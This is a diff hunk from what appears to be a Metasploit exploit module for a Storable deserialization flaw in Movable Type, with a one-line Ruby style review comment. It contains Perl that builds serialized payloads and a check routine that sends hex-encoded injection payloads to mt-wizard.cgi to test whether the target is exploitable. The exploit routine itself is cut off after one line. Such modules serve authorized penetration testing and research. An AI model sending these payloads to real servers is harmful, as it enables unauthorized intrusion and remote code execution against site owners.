modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb

```diff
@@ -0,0 +1,326 @@
+print "LFI test for storable flaw is: $frozen\n";
+
+{
+    package DateTime;
+    use overload '+' => sub { 'ignored' };
+}
+
+my $datetime_loader = bless \{}, DateTime;
+$frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $datetime_loader});
+$frozen = unpack 'H*', $frozen;
+print "Module load test for DateTime presence is: $frozen\n";
+
+{
+    package Object::MultiType;
+    use overload '+' => sub { 'ignored' };
+}
+
+my $object_multitype_loader = bless \{}, Object::MultiType;
+$frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({x => $object_multitype_loader});
+$frozen = unpack 'H*', $frozen;
+print "Module load test for Obect::MultiType presence is: $frozen\n";
+
+=end
+
+  def check
+    vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure")
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => normalize_uri(datastore['URI'], '/mt-wizard.cgi'),
+        'vars_get' => {
+          '__mode' => 'retry',
+          'step'   => 'configure',
+          'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
+        }
+      })
+    if (!res or res.code != 200 or res.body !~ /Can't locate XXXCHECKXXX\.pm/)
+      vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test");
+      return Exploit::CheckCode::Safe
+    end
+
+    if ( datastore['DESTRUCTIVE'] == true )
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    vprint_status("#{peer} - Sending storable test injection for DateTime presence")
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => normalize_uri(datastore['URI'], '/mt-wizard.cgi'),
+        'vars_get' => {
+          '__mode' => 'retry',
+          'step'   => 'configure',
+          'config' => '53455247000000000000000304080831323334353637380408080803010000001411084461746554696d650403000000000100000078'
+        }
+      })
+    if (!res or res.code != 200 or res.body =~ /Can't locate DateTime\.pm/)
+      vprint_status("#{peer} - Failed DateTime load test");
+      return Exploit::CheckCode::Safe
+    end
+
+    vprint_status("#{peer} - Sending storable test injection for Object::MultiType presence")
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => normalize_uri(datastore['URI'], '/mt-wizard.cgi'),
+        'vars_get' => {
+          '__mode' => 'retry',
+          'step'   => 'configure',
+          'config' => '53455247000000000000000304080831323334353637380408080803010000001411114f626a6563743a3a4d756c7469547970650403000000000100000078'
+        }
+      })
+    if (!res or res.code != 200 or res.body =~ /Can't locate Object\/MultiType\.pm/)
+      vprint_status("#{peer} - Failed Object::MultiType load test");
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    if ( datastore['DESTRUCTIVE'] == true )
```

Comment:
You can omit parenthesis here https://github.com/bbatsov/ruby-style-guide#no-parens-if